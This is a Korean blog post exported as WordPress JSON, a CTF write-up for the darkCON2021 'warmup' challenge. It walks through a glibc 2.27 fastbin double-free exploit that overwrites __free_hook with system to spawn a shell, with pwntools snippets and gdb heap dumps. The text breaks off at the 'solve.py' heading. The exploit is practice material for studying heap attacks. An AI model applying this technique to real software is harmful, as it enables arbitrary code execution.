{"id":3626,"date":"2025-05-15T23:07:56","date_gmt":"2025-05-15T14:07:56","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3626"},"modified":"2025-05-15T23:19:23","modified_gmt":"2025-05-15T14:19:23","slug":"darkcon2021-warmup","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3626","title":{"rendered":"[darkCON2021] warmup (fastbin_dup, glibc 2.27)"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">\uc694\uc57d<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\uc774\ubc88\uc5d0 \ubb38\uc81c\ub97c \ud480\uba74\uc11c <strong>\ud560\ub2f9\ud560\ub54c fastbin\uc774\ub098 tcache\uac00 \ub4e4\uc5b4\uac00\ub294\uac8c \uc544\ub2cc,<\/strong> <br><strong>free\ud560\ub54c \ub4e4\uc5b4\uac00\ub294\uac83\uc744<\/strong> \uae68\ub2ec\uc558\ub2e4. (\uc774\ub54c\uae4c\uc9c0 \uc798\ubabb \uc54c\uace0 \uc788\uc5c8\ub124\u3160)<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Fill up tcache, alloc10\ubc88 &amp; (\ucc98\uc74c \uae30\uc900) free7\ubc88<\/li>\n\n\n\n<li>fastbin_dup (Trigger DFB bug)<\/li>\n\n\n\n<li>empty_tcache (alloc 7\ubc88)<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">1st alloc &#8211; (free_hook \ud3ec\uc778\ud130 \uc8fc\uc18c)AAW\ud560 \uc8fc\uc18c \ub300\uc0c1\uc73c\ub85c \uc500. <br>2nd alloc &#8211; \ub354\ubbf8\ub85c \uc500. <br>3rd alloc &#8211; (\/bin\/sh) \uac12\uc744 \uc500. <br>4th alloc &#8211; (system \ud568\uc218 \uc8fc\uc18c)AAW \ub36e\uc744 \uac12\uc73c\ub85c \uc500.<\/p>\n\n\n\n<ol start=\"5\" class=\"wp-block-list\">\n<li>\uc774\uc81c \/bin\/sh\uac00 \uc801\ud78c \uccad\ud06c\ub85c free\uc2dc\ud0a4\uba74 \uc258 \ud68d\ub4dd.<\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\">\ud658\uacbd<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\uc6b0\ubd84\ud22c 18.04 \/ GLIBC 2.27-3ubuntu1.6<\/strong><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Source<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/github.com\/sajjadium\/ctf-archives\/tree\/main\/ctfs\/darkCON\/2021\/pwn\/Warmup\">https:\/\/github.com\/sajjadium\/ctf-archives\/tree\/main\/ctfs\/darkCON\/2021\/pwn\/Warmup<\/a><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">checksec<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">seo@ubuntu:~\/study\/warmup$ checksec .\/a.out\n[!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 5)\n[*] '\/home\/seo\/study\/warmup\/a.out'\n    Arch:       amd64-64-little\n    RELRO:      Partial RELRO\n    Stack:      Canary found\n    NX:         NX enabled\n    PIE:        No PIE (0x400000)<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">1. Fill up tcache, alloc10 &amp; free7<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">tcache\ub97c \ucc44\uc6b0\uae30 \uc704\ud574 alloc(0x20)\uc744 10\ubc88\ud55c\ub2e4\uc74c, free\ub97c \ucc98\uc74c\uae30\uc900 7\ubc88\ud574\uc900\ub2e4.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">alloc10<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">for i in range(10):\n    create(i, 0x20, b\"A\"*8)<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Result<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"649\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-45-1024x649.png\" alt=\"\" class=\"wp-image-3629\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-45-1024x649.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-45-300x190.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-45-768x487.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-45.png 1191w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk \n0x603000            0x0                 0x250                Used                None              None\n0x603250            0x0                 0x20                 Used                None              None\n0x603270            0x0                 0x20                 Used                None              None\n0x603290            0x0                 0x20                 Used                None              None\n0x6032b0            0x0                 0x20                 Used                None              None\n0x6032d0            0x0                 0x20                 Used                None              None\n0x6032f0            0x0                 0x20                 Used                None              None\n0x603310            0x0                 0x20                 Used                None              None\n0x603330            0x0                 0x20                 Used                None              None\n0x603350            0x0                 0x20                 Used                None              None\n0x603370            0x0                 0x20                 Used                None              None\n0x603390            0x0                 0x20                 Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x6033b0 (size : 0x20c50)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\ngdb-peda$<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">free7<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">for i in range(7):\n    delete(i)<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Result<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"678\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-46-1024x678.png\" alt=\"\" class=\"wp-image-3632\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-46-1024x678.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-46-300x199.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-46-768x509.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-46.png 1261w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk \n0x603000            0x0                 0x250                Used                None              None\n0x603250            0x0                 0x20                 Used                None              None\n0x603270            0x0                 0x20                 Freed                0x0              None\n0x603290            0x0                 0x20                 Freed           0x603280              None\n0x6032b0            0x0                 0x20                 Freed           0x6032a0              None\n0x6032d0            0x0                 0x20                 Freed           0x6032c0              None\n0x6032f0            0x0                 0x20                 Freed           0x6032e0              None\n0x603310            0x0                 0x20                 Freed           0x603300              None\n0x603330            0x0                 0x20                 Freed           0x603320              None\n0x603350            0x0                 0x20                 Used                None              None\n0x603370            0x0                 0x20                 Used                None              None\n0x603390            0x0                 0x20                 Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x6033b0 (size : 0x20c50)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](7): 0x603340 --> 0x603320 --> 0x603300 --> 0x6032e0 --> 0x6032c0 --> 0x6032a0 --> 0x603280\ngdb-peda$<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">2. fastbin_dup<\/h3>\n\n\n\n<h3 class=\"wp-block-heading\">1.<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">delete(7)<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">fastbin\uc5d0 \ud574\ub2f9\ub418\ubbc0\ub85c fd\uac12\uc774 0\uc784.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"644\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-47-1024x644.png\" alt=\"\" class=\"wp-image-3633\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-47-1024x644.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-47-300x189.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-47-768x483.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-47.png 1207w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk \n0x603000            0x0                 0x250                Used                None              None\n0x603250            0x0                 0x20                 Used                None              None\n0x603270            0x0                 0x20                 Freed                0x0              None\n0x603290            0x0                 0x20                 Freed           0x603280              None\n0x6032b0            0x0                 0x20                 Freed           0x6032a0              None\n0x6032d0            0x0                 0x20                 Freed           0x6032c0              None\n0x6032f0            0x0                 0x20                 Freed           0x6032e0              None\n0x603310            0x0                 0x20                 Freed           0x603300              None\n0x603330            0x0                 0x20                 Freed           0x603320              None\n0x603350            0x0                 0x20                 Freed                0x0              None\n0x603370            0x0                 0x20                 Used                None              None\n0x603390            0x0                 0x20                 Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x603350 --> 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x6033b0 (size : 0x20c50)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](7): 0x603340 --> 0x603320 --> 0x603300 --> 0x6032e0 --> 0x6032c0 --> 0x6032a0 --> 0x603280\ngdb-peda$<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">2.<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">delete(8)<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">free\ub41c mem[8]\uc5d0 fd\uac12\uc774 \uc801\ud798.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"631\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-48-1024x631.png\" alt=\"\" class=\"wp-image-3634\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-48-1024x631.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-48-300x185.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-48-768x473.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-48.png 1207w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk \n0x603000            0x0                 0x250                Used                None              None\n0x603250            0x0                 0x20                 Used                None              None\n0x603270            0x0                 0x20                 Freed                0x0              None\n0x603290            0x0                 0x20                 Freed           0x603280              None\n0x6032b0            0x0                 0x20                 Freed           0x6032a0              None\n0x6032d0            0x0                 0x20                 Freed           0x6032c0              None\n0x6032f0            0x0                 0x20                 Freed           0x6032e0              None\n0x603310            0x0                 0x20                 Freed           0x603300              None\n0x603330            0x0                 0x20                 Freed           0x603320              None\n0x603350            0x0                 0x20                 Freed                0x0              None\n0x603370            0x0                 0x20                 Freed           0x603350              None\n0x603390            0x0                 0x20                 Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x603370 --> 0x603350 --> 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x6033b0 (size : 0x20c50)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](7): 0x603340 --> 0x603320 --> 0x603300 --> 0x6032e0 --> 0x6032c0 --> 0x6032a0 --> 0x603280\ngdb-peda$<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">3.<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">delete(7)<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\ub2e4\uc2dc\ud55c\ubc88 mem[7]\uc744 free\uc2dc\ud0b4 \u2192 double free\ub428.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\ub530\ub77c\uc11c mem[7] fd \uac12\uc774 mem[8] \uccad\ud06c \uc8fc\uc18c\ub85c \uc4f0\uc5ec\uc9d0.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"510\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-49-1024x510.png\" alt=\"\" class=\"wp-image-3636\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-49-1024x510.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-49-300x149.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-49-768x382.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-49.png 1533w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk \n0x603000            0x0                 0x250                Used                None              None\n0x603250            0x0                 0x20                 Used                None              None\n0x603270            0x0                 0x20                 Freed                0x0              None\n0x603290            0x0                 0x20                 Freed           0x603280              None\n0x6032b0            0x0                 0x20                 Freed           0x6032a0              None\n0x6032d0            0x0                 0x20                 Freed           0x6032c0              None\n0x6032f0            0x0                 0x20                 Freed           0x6032e0              None\n0x603310            0x0                 0x20                 Freed           0x603300              None\n0x603330            0x0                 0x20                 Freed           0x603320              None\n0x603350            0x0                 0x20                 Freed           0x603370              None\n0x603370            0x0                 0x20                 Freed           0x603350              None\n0x603390            0x0                 0x20                 Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x603350 --> 0x603370 --> 0x603350 (overlap chunk with 0x603350(freed) )\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x6033b0 (size : 0x20c50)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](7): 0x603340 --> 0x603320 --> 0x603300 --> 0x6032e0 --> 0x6032c0 --> 0x6032a0 --> 0x603280\ngdb-peda$<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">3. empty tcache<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">for i in range(7):\n    create(i, 0x10, b\"C\"*8)<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\uc774\uc81c tcache\ub97c \ube44\uc6b0\uae30 \uc704\ud574, mem[0]~mem[6]\uae4c\uc9c0 malloc(0x20) 7\ubc88 \uc7ac\ud560\ub2f9\ud574\uc900\ub2e4.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"469\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-50-1024x469.png\" alt=\"\" class=\"wp-image-3638\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-50-1024x469.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-50-300x138.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-50-768x352.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-50-1536x704.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-50.png 1564w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk \n0x603000            0x0                 0x250                Used                None              None\n0x603250            0x0                 0x20                 Used                None              None\n0x603270            0x0                 0x20                 Used                None              None\n0x603290            0x0                 0x20                 Used                None              None\n0x6032b0            0x0                 0x20                 Used                None              None\n0x6032d0            0x0                 0x20                 Used                None              None\n0x6032f0            0x0                 0x20                 Used                None              None\n0x603310            0x0                 0x20                 Used                None              None\n0x603330            0x0                 0x20                 Used                None              None\n0x603350            0x0                 0x20                 Freed           0x603370              None\n0x603370            0x0                 0x20                 Freed           0x603350              None\n0x603390            0x0                 0x20                 Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x603350 --> 0x603370 --> 0x603350 (overlap chunk with 0x603350(freed) )\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x6033b0 (size : 0x20c50)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\ngdb-peda$\n<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">4. Let&#8217;s AAW!<\/h3>\n\n\n\n<h3 class=\"wp-block-heading\">1.<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">create(7, 0x10, p64(free_hook))<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">mem[7] \uc8fc\uc18c \ud560\ub2f9\ud558\uace0 free_hook \uc8fc\uc18c\ub97c \uc500.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\uc774\ub294 \ucd94\ud6c4 <code>free_hook<\/code> \uc8fc\uc18c\ub85c \ub2e4\uc2dc \ud560\ub2f9\ubc1b\uc744 \uc608\uc815.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"637\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-51-1024x637.png\" alt=\"\" class=\"wp-image-3639\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-51-1024x637.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-51-300x187.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-51-768x478.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-51.png 1213w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk \n0x603000            0x0                 0x250                Used                None              None\n0x603250            0x0                 0x20                 Used                None              None\n0x603270            0x0                 0x20                 Used                None              None\n0x603290            0x0                 0x20                 Used                None              None\n0x6032b0            0x0                 0x20                 Used                None              None\n0x6032d0            0x0                 0x20                 Used                None              None\n0x6032f0            0x0                 0x20                 Used                None              None\n0x603310            0x0                 0x20                 Used                None              None\n0x603330            0x0                 0x20                 Used                None              None\n0x603350            0x0                 0x20                 Freed     0x7ffff7dcf8e8              None\n0x603370            0x0                 0x20                 Freed           0x603360              None\n0x603390            0x0                 0x20                 Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x6033b0 (size : 0x20c50)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](3): 0x603380 --> 0x603360 --> 0x7ffff7dcf8e8\ngdb-peda$<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">2.<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">mem[8], mem[9] \uc8fc\uc18c \ud560\ub2f9\ud558\uace0<br>mem[9]\uc5d0 \/bin\/sh \uac12\uc744 \uc500.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">create(8, 0x10, b\"D\"*8)\ncreate(9, 0x10, '\/bin\/sh\\x00')<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"621\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-52-1024x621.png\" alt=\"\" class=\"wp-image-3640\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-52-1024x621.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-52-300x182.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-52-768x466.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-52.png 1239w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk \n0x603000            0x0                 0x250                Used                None              None\n0x603250            0x0                 0x20                 Used                None              None\n0x603270            0x0                 0x20                 Used                None              None\n0x603290            0x0                 0x20                 Used                None              None\n0x6032b0            0x0                 0x20                 Used                None              None\n0x6032d0            0x0                 0x20                 Used                None              None\n0x6032f0            0x0                 0x20                 Used                None              None\n0x603310            0x0                 0x20                 Used                None              None\n0x603330            0x0                 0x20                 Used                None              None\n0x603350            0x0                 0x20                 Used                None              None\n0x603370            0x0                 0x20                 Used                None              None\n0x603390            0x0                 0x20                 Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x6033b0 (size : 0x20c50)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](1): 0x7ffff7dcf8e8\ngdb-peda$<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">3.<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\uc774\uc81c \ud55c\ubc88\ub354 \ud560\ub2f9\ud558\uba74, free_hook \uc8fc\uc18c\ub85c \ud560\ub2f9\ubc1b\uac8c \ub418\uace0,<br>\ud574\ub2f9 \ud3ec\uc778\ud130 \uc8fc\uc18c\uc5d0 system \ud568\uc218\uc8fc\uc18c\ub85c \ub36e\uc5b4\uc500.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">create(10, 0x10, p64(system))<\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"533\" height=\"278\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-53.png\" alt=\"\" class=\"wp-image-3641\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-53.png 533w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-53-300x156.png 300w\" sizes=\"auto, (max-width: 533px) 100vw, 533px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">4.<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">delete(9)<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\uc774\ud6c4 \uc778\ub371\uc2a49\uc5d0 \/bin\/sh \uac12\uc774 \uc801\ud614\ub358 \uccad\ud06c\ub97c \ud560\ub2f9 \ud574\uc81c\ud558\uac8c \ub418\uba74, <br>\uc258\uc744 \ud68d\ub4dd\ud560 \uc218 \uc788\uc74c.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">solve.py<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" 